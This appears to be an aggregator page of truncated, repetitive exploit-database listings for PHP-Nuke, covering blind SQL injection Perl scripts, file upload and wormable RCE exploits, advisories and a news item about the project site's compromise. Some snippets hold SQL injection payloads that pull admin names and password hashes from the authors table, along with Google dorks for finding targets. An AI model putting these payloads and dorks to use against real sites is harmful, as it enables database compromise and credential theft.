PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode)

PHP-Nuke 8.1.0.3.5b YourAccount Module - Blind SQL Injection Benchmark Mode PHP-Nuke new; my $average = 0; print "+ Calculating average load time may take a while ...\n"; for my $i = 0; $i get$hosto; my $time = time; $average += int$time-$bef; return $average/5; sub Nuke::Usage print "+ Usage: pe...

PHP-Nuke 8.0 - SQL Injection

PHP-Nuke 8.0 - SQL Injection !/usr/bin/perl 0-Day PHP-Nuke newPOST = $HostName.'modules.php?name=News'; my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent agent = 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies, defaultheaders = HTTP::Headers-new, or die $!; my $Referrer =...

PHP-Nuke 8.0 - SQL Injection

!/usr/bin/perl 0-Day PHP-Nuke newPOST = $HostName.'modules.php?name=News'; my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent agent = 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies, defaultheaders = HTTP::Headers-new, or die $!; my $Referrer = "sid=Dante90, WaRWolFz Crew...

PHP-Nuke 8.0 News SQL Injection

!/usr/bin/perl 0-Day PHP-Nuke newPOST = $HostName.'modules.php?name=News'; my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent agent = 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies, defaultheaders = HTTP::Headers-new, or die $!; my $Referrer = "sid=Dante90, WaRWolFz Crew...

PHP-Nuke 8.2 - Arbitrary File Upload

PHP-Nuke 8.2 - Arbitrary File Upload Title : PHPnuke 8.2 Remote Upload File Exploit Author : Net.Edit0r Location : Iran Dork : "POWERED BY PHPNUKE.IR" Category : Remote Email : [email protected] [email protected] Special Thanks To :NetQurd For help in finding bugs Email :[email protected]...

PHP-Nuke <= 8.0 (News) Remote SQL Injection Exploit

Exploit for php platform in category web applications =================================================== PHP-Nuke newPOST = $HostName.'modules.php?name=News'; my $Cookies = new HTTP::Cookies; my $UserAgent = new LWP::UserAgent agent = 'Mozilla/5.0', maxredirect = 0, cookiejar = $Cookies,...

PHP-Nuke Print 6.0 SQL Injection

PHP-Nuke Module print 6.0 print&sid SQL Injection Vulnerability Author : Gamoscu Homepage : www.1923turk.com Blog : http://gamoscu.wordpress.com Script : PHP-Nuke Module print 6.0 Download : http://phpnuke.org/modules.php?name=Downloads&dop=viewdownload&cid=6 Vulnerable File...

PHP-Nuke Module print 6.0 (print&amp;sid) SQL Injection Vulnerability

No description provided by source. Author : Gamoscu Homepage : www.1923turk.com Blog : http://gamoscu.wordpress.com Script : PHP-Nuke Module print 6.0 Download : http://phpnuke.org/modules.php?name=Downloads&dop=viewdownload&cid=6 Vulnerable File modules.php?name=News&file=print&sid= SQL XpL...

PHP-Nuke Module print 6.0 - &#039;print&amp;sid&#039; SQL Injection

PHP-Nuke Module print 6.0 print&sid SQL Injection Vulnerability Author : Gamoscu Homepage : www.1923turk.com Blog : http://gamoscu.wordpress.com Script : PHP-Nuke Module print 6.0 Download : http://phpnuke.org/modules.php?name=Downloads&dop=viewdownload&cid=6 Vulnerable File...

PHP-Nuke Module print 6.0 - printsid SQL Injection

PHP-Nuke Module print 6.0 - printsid SQL Injection PHP-Nuke Module print 6.0 print&sid SQL Injection Vulnerability Author : Gamoscu Homepage : www.1923turk.com Blog : http://gamoscu.wordpress.com Script : PHP-Nuke Module print 6.0 Download :...

PHP-Nuke Module print 6.0 (print&sid) SQL Injection Vulnerability

Exploit for php platform in category web applications ================================================================= PHP-Nuke Module print 6.0 print&sid SQL Injection Vulnerability ================================================================= PHP-Nuke Module print 6.0 print&sid SQL Injecti...

PHP-Nuke多个SQL注入漏洞

BUGTRAQ ID: 39922 PHP-Nuke是一个广为流行的网站创建和管理工具，可使用很多数据库软件作为后端，如MySQL、PostgreSQL、mSQL、 Interbase、Sybase等。 PHP-Nuke没有正确地过滤提交给/modules/Journal/savenew.php页面的mood变量，以及提交给/modules /YourAccount/admin/index.php页面的chnguser变量。远程攻击者可以通过提交恶意查询请求执行SQL注入攻击，完全入侵数据库系统。 PHP-Nuke PHP-Nuke 8.1.35 PHP-Nuke PHP-Nuke 8....

Main PHP-Nuke Site Compromised

The main site for the PHP-Nuke content management system software has been compromised and is serving malicious iFrame exploits to visitors. Researchers at Websense found that the phpnuke.org site is currently serving several different exploits. The attack uses the common iFrame-redirection...

PHP-Nuke (friend.php) Module Remote SQL Injection Vulnerability

Exploit for php platform in category web applications =============================================================== PHP-Nuke friend.php Module Remote SQL Injection Vulnerability =============================================================== Exploit Title: PHP-Nuke 'friend.php' Module Remote SQ...

PHP-Nuke - &#039;friend.php&#039; Module SQL Injection

Exploit Title: PHP-Nuke 'friend.php' Module Remote SQL Injection Date: 05.05.2010 Author: CMD Contact : [email protected] Version: all version =-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-= Code : //and//1=0//union//select//groupconcataid,0x3a,pwd//from//authors/...

PHP-Nuke Friend SQL Injection

Exploit Title: PHP-Nuke 'friend.php' Module Remote SQL Injection Date: 05.05.2010 Author: CMD Contact : [email protected] Version: all version =-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-= Tested on:...

PHP-Nuke - friend.php Module SQL Injection

PHP-Nuke - friend.php Module SQL Injection Exploit Title: PHP-Nuke 'friend.php' Module Remote SQL Injection Date: 05.05.2010 Author: CMD Contact : [email protected] Version: all version =-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-= Code :...

PHP-NUKE v5.0 viewslink Remote SQL Injection

No description provided by source. Author: CMD Contact: [email protected] Dork: allinurl: op=viewslink&sid= =-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-= Code : Exploit 1: /links.php?op=viewslink&sid=-1//union//select//0,aid//from//nukeauthors//where//radminsuper=1/...

PHP-Nuke 7.0 / 8.1 / 8.1.35 Wormable Remote Code Execution

!/usr/bin/php ?php / Wormable Remote Code Execution in PHP-Nuke 7.0/8.1/8.1.35newist as of release Vendor's Website:http://phpnuke.org/ Secuirty Researcher: Michael Brooks https://sitewat.ch Original Advisory: http://blog.sitewat.ch/2010/05/vulnerabilities-in-php-nuke.html Google hack: "Francisco...

PHP-Nuke viewslink Remote SQL Injection Vulnerability

Exploit for php platform in category web applications ===================================================== PHP-Nuke viewslink Remote SQL Injection Vulnerability ===================================================== Version: PHP Nuke 5.0 and other version Dork: allinurl: op=viewslink&sid=...